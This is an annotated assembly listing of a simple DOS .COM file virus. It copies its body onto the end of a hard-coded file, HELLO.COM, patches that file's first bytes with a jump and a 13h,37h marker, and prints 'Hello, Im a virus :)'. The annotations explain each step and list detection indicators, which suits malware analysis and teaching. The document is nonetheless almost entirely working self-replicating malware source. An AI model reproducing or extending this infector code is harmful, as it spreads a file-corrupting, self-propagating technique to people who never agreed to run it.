;-----------------------------------------------------------------------
; Appending .COM file infector for DOS (16-bit real mode, Intel syntax).
; Annotated listing for analysis; the instructions are unchanged.
;
; Image layout: a short stub (jmp + 13h,37h marker) followed by the
; body `start` .. `end`. All data is addressed as [bp + label], where
; bp is the load displacement computed at `main`.
;
; What one run does, as written below:
;   1. Copies the 5 saved bytes at `bytes` to offset 100h.
;   2. Opens the file named by `fname` read/write and reads its first
;      5 bytes into `bytes`. `bytes` declares 3 bytes and `sig1` (2
;      bytes) follows it directly, so the read also fills `sig1`.
;   3. Skips the file if the word in `sig1` (file offsets 3-4) equals
;      the 13h,37h marker in `sig`.
;   4. Otherwise overwrites the first 5 file bytes with
;      E9 <disp16> 13h 37h (disp16 = file size - 3) and appends
;      `end - start` bytes of this body to the end of the file.
;   5. Prints `msg` and leaves through push/ret.
;
; Indicators visible in this source (detection / triage):
;   - .COM file whose first bytes are E9 xx xx 13 37
;   - file length increased by (end - start) bytes
;   - INT 21h calls in the order 3Dh (AL=02h), 3Fh, 42h, 42h, 40h,
;     42h, 40h, 3Eh on one handle
;   - the string 'Hello, Im a virus :)' and the name 'HELLO.COM'
;     inside the appended body
;
; Assumptions not established by this file: DS = ES (normal for a
; .COM program) and direction flag clear for movs/cmps -- confirm.
;-----------------------------------------------------------------------

        org 100h                        ; .COM images are loaded at offset 100h

;; First-generation stub. The author describes it as a five-byte
;; placeholder standing in for an already-modified host file
;; (presumably a 3-byte near jmp plus the 2 marker bytes -- confirm
;; the encoding your assembler picks).
program:
        jmp start                       ; skip the marker bytes, enter the body
infect:
        db 13h, 37h                     ; marker: "this file already carries the body"

;; Delta-offset computation: `call` pushes the run-time address of
;; `main`; subtracting the assemble-time address leaves the
;; displacement between where the body was assembled and where it runs.
start:
        call main
main:
        pop bp                          ; bp = run-time address of `main`
        sub bp, main                    ; bp = run-time minus assemble-time offset

;; Put the saved first five bytes back at 100h (in memory only)
        lea si, [bp+bytes]              ; source: saved bytes (`bytes` + `sig1`)
        mov di, 100h                    ; destination: start of the loaded program
        movsw                           ; bytes 0-1
        movsw                           ; bytes 2-3
        movsb                           ; byte 4

;; Select the target file
        call search                     ; returns dx -> ASCIIZ file name

;; Open the target file
        mov ax,3d02h                    ; AH=3Dh open, AL=02h read/write
        int 21h
        jc jump                         ; CF set = open failed: go to the payload
        xchg ax, bx                     ; bx = file handle for the calls below

;; Read the first five bytes of the file and keep them for later
        mov ah, 3fh                     ; AH=3Fh read from handle
        lea dx, [bp+bytes]              ; buffer: `bytes` (3) + `sig1` (2)
        mov cx, 5                       ; number of bytes to read
        int 21h

;; Check for an earlier modification of this file
        lea si, [bp + sig1]             ; word just read from file offsets 3-4
        lea di, [bp + sig]              ; expected marker 13h,37h
        cmpsw                           ; compare the two words
        jz jump                         ; equal: file already marked, skip it

        mov al, 2                       ; seek origin: end of file
        call move                       ; ax = file size (low word)
        sub ax, 3                       ; displacement for a 3-byte E9 jmp at offset 0
        mov [bp+addr], ax               ; patch it into the hexjmp/addr/sig record

;; Overwrite the start of the file with 'jump to appended body' + marker
        mov al, 0                       ; seek origin: beginning of file
        call move
        mov ah, 40h                     ; AH=40h write to handle
        mov cx, 5                       ; E9 + disp16 + 2 marker bytes
        lea dx,[bp+hexjmp]              ; buffer: hexjmp, addr, sig (contiguous)
        int 21h

;; Append the body to the end of the file
        mov al, 2                       ; seek origin: end of file
        call move
        mov ah, 40h                     ; AH=40h write to handle
        mov cx, end-start               ; body length in bytes
        lea dx, [bp+start]              ; buffer: run-time address of `start`
        int 21h

;; Close the file
        mov ah, 3eh                     ; AH=3Eh close handle
        int 21h

jump:
;; Payload: print the message, then hand control back
        mov ah,09                       ; AH=09h print '$'-terminated string
        lea dx, [bp + msg]              ; message buffer
        int 21h
        mov di,100                      ; return offset; literal is 100 with no h suffix,
                                        ; unlike the 100h used for the restore above
        push di                         ; place it on the stack as a return address
        ret                             ; near return to the offset just pushed

;; Target selection. As written there is no directory search: it only
;; returns the address of the hard-coded name below.
search:
        lea dx,[bp + fname]             ; dx -> file name
        ret
fname   db 'HELLO.COM',0                ; the single file this listing targets

;; Move file pointer. In: al = origin (0 = beginning, 2 = end),
;; bx = handle. Offset is always 0. Callers use only AX of the result.
move:
        mov ah, 42h                     ; AH=42h move file pointer
        xor cx, cx                      ; offset high word = 0
        xor dx, dx                      ; offset low word = 0
        int 21h
        ret

;; Five-byte record written over the start of the target file
hexjmp: db 0e9h                         ; opcode of a near jmp
addr:   dw 0                            ; displacement, filled in before the write
sig:    db 13h, 37h                     ; marker bytes

;; Saved first bytes of the host file. The read above stores five
;; bytes here, so `sig1` holds bytes 3-4. The initial value starts
;; with CDh 20h ("INT 20h", terminate program).
bytes:  db 0cdh, 20h, 0
sig1:   db 0, 0

msg:    db 'Hello, Im a virus :)',0Dh,0Ah,'$'

end:
        nop                             ; end of the body; not counted in end-start